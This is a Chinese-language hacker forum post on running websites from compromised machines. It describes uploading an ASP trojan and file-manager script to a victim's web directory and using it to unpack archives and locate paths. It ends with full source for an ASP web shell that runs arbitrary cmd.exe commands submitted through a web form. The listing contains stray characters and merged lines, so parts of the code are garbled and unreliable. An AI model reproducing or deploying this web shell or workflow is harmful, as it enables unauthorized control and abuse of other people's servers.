我想大家都有一些開了80端口的肉雞吧,如果是國內的出於安全就不要往下看了,如果不不妨往下看一下,小弟獻丑了,以求拋磚引玉.
在肉雞上放網站最麻煩的可能就是更新和上傳大量的文件了,終端服務大白天容易被發現,自己開個ftp又不放心.自己在網上轉了一圈發現通過結合無組件上傳和asp木馬可以輕松實現.
asp木馬大家都很熟悉,無非就是一個cmd,有什麼作用啊,你別急,聽我慢慢說嘛.整體思路就是先通過ftp,139,或者winshell上傳一個無組件asp程序.我選擇了化境的webedit(其實這個已經不是一個單純的無組件上傳的工具了,通過它還可以修改,刪除文件/目錄,可以用來更新頁面喔,作起來廣告了,我跟他沒親戚啊,閃過一個flying bottle..繼續)和一個asp木馬(如果,實在懶得找.最後帶著源碼,粘貼另存為asp文件即可),記住可都要在肉雞的web目錄喔.其實大多的問題webedit都可以解決,不過如果有很多文件一個一個上傳可就麻煩了,怎麼辦?這下asp木馬用上了.找一個rar.exe(所有裝過了winrar的目錄都有,說不定肉雞上已經安好了,如果是別的命令行的解壓縮工具也可以喔)把它拷到%SystemRoot%system32下.上傳.zip或者.rar文件到該肉雞的web目錄.在浏覽器地址欄裡打開asp木馬(暫時稱之為trojan.asp),在text文本框裡輸入rar -x source.rar path解壓縮成功,V,且慢如何得到web目錄的絕對路徑(path)呢?我用的是用土方法,修改trojan.asp加入一行轉換虛擬目錄成絕對路徑並輸出的語句<% =server.mappath(".") %>,"."可以隨意改成任何的相對虛擬目錄.
只是提供一個思路,如果哪個牛人可寫一個asp的解壓縮那更好喽,不過?誰會呢,我不會,你會嗎?至於如何隱藏虛擬目錄,支持簡體中文顯示等就不是該篇的討論之列了,老話,安全第一,一般放個小的論壇或聊天室就可以了,如果真放個個人主頁,還把自己的聯系地址,電話號碼也留給人家就不太好了.ps.junesun建議直接作成自解壓,不知會不會彈出對話框。
--------以下是asp木馬的源碼,建議在後加上<% =server.mappath(".") %>------------------------------
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFileOn Error Resume Next
<' -- create the COM objects that we will be using -- '
Set oScript = Server.createObject("WSCRIPT.SHELL")
Set oScriptNet = Server.createObject("WSCRIPT.NETWORK")
Set oFileSys = Server.createObject("Scripting.FileSystemObject") <' -- check for a command that we have posted -- '
szCMD = Request.form(".CMD")
If (szCMD <> "") Then <' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) <End If <
%>
<HTML>
<BODY>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</form>
<PRE> <<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
>